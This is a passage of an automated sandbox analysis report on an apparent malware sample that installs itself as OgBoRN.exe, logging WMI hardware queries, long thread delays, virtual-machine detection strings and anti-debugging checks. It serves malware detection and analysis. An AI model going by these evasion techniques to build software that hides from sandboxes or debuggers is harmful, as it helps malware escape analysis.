              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599862Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599734Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599468Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599359Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599140Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599031Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598921Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598812Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598481Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598265Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597937Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597478Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597358Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597116Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594452Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598666Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598224Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597966Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597818Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597702Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597415Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597309Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597077Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596166Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596049Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595667Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595438Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595313Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594266Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594155Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594041Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593923Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593811Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599449Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599016Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598907Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598782Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598428Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598018Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597767Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597525Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597417Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596704Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596579Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595708Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595579Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594840Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593990Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593735Jump to behavior
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: get_VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: virtualMachinesRoleSizes
              Source: OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: get_ErrorUpdatingVirtualMachine
              Source: OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VIRTUAL-vmware/VirtualBox0root\CIMV21SELECT * FROM Win32_VideoController2Name3VMware
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: get_ErrorCreatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: set_VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DnsDoesNotExistVEnableRemoteDesktop_FriendlyCertificateName<EndPointNotFoundForBlobStorage EndProcessingLogPEnvironmentDoesNotSupportActiveDirectory"EnvironmentExistsLEnvironmentNameDoesntMatchSubscriptionBEnvironmentNameNeedsToBeSpecified:EnvironmentNeedsToBeSpecified&EnvironmentNotFound(EnvironmentsFileName6ErrorCreatingVirtualMachineDErrorRetrievingRuntimesForLocation6ErrorUpdatingVirtualMachine*FailedJobErrorMessage$FilePathIsNotValid2FirstPurchaseErrorMessage(FirstPurchaseMessage,GatewayOperationStatus$GeneralScaffolding.GetAllAddOnsWaitMessage(GetStorageKeysHeader
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: set_SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: ErrorUpdatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: ErrorCreatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: get_VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: set_VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CreatedTime&ComputeCapabilities0VirtualMachinesRoleSizes$WebWorkerRoleSizes
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MemoryInMb2SupportedByWebWorkerRoles4SupportedByVirtualMachines MaxDataDiskCount:WebWorkerResourceDiskSizeInMbDVirtualMachineResourceDiskSizeInMb4CurrentVirtualNetworkSites0CurrentLocalNetworkSites"CurrentDnsServers&ListOperationsAsync
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drBinary or memory string: get_SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4617984919.0000000006C68000.00000004.00000020.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2399862479.0000000007A29000.00000004.00000020.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4624967654.0000000007800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03365BE0 CheckRemoteDebuggerPresent,0_2_03365BE0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: page read and write | page guardJump to behavior
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Users\user\Desktop\gq8sce-clean.com.com.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
